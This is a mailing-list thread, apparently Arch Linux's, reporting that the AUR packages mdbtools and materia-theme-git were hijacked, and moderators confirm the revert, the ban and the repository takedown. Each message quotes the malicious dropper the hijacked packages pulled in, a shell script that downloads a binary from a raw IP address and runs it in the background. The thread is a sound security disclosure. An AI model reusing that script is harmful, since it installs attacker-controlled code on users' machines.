AUR Packages Hijacked: mdbtools / materia-theme-git
Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179 ----- I've noticed these two packages being "hijacked": mdbtools and materia-theme-git Both under the same user "koolpp" The new versions uploaded refer to a shell script available at a Codeberg repository: https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson.... The scripts execute the following: ```sh #!/bin/sh mkdir -p /usr/lib64 curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3 chmod +x /usr/lib64/libkwrk.so.1.5.3 setsid /usr/lib64/libkwrk.so.1.5.3 & ``` Looks like a remote file will create a background session with execute permissions if you install these packages. May these new packages versions be taken down
Hey GlassTree, On 25/10/29 10:43AM, GlassTree wrote:
Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179 -----
I've noticed these two packages being "hijacked": mdbtools and materia-theme-git
Both under the same user "koolpp"
Thanks for noticing this takeover and letting us know, both packages have been reverted by another moderator to the pre-takeover state a few minutes ago and the offending account has been banned.
The new versions uploaded refer to a shell script available at a Codeberg repository: https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson....
The scripts execute the following:
```sh #!/bin/sh mkdir -p /usr/lib64 curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3 chmod +x /usr/lib64/libkwrk.so.1.5.3 setsid /usr/lib64/libkwrk.so.1.5.3 & ```
Looks like a remote file will create a background session with execute permissions if you install these packages.
May these new packages versions be taken down
If someone trustworthy with a track record of maintaining AUR packages wants to take care of these packages (especially the more popular mdbtools) please let us know in an orhphan request. Cheers and have nice day! Chris
Hi, On 10/29/25 10:43, GlassTree wrote:
Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179 -----
I've noticed these two packages being "hijacked": mdbtools and materia-theme-git
Both under the same user "koolpp"
The new versions uploaded refer to a shell script available at a Codeberg repository: https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson....
I reported this to codeberg moderation team earlier and the repos have been taken down now as well!
The scripts execute the following:
```sh #!/bin/sh mkdir -p /usr/lib64 curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3 chmod +x /usr/lib64/libkwrk.so.1.5.3 setsid /usr/lib64/libkwrk.so.1.5.3 & ```
Looks like a remote file will create a background session with execute permissions if you install these packages.
May these new packages versions be taken down
Marcus
participants (3)
-
Christian Heusel
-
GlassTree
-
Marcus Hoffmann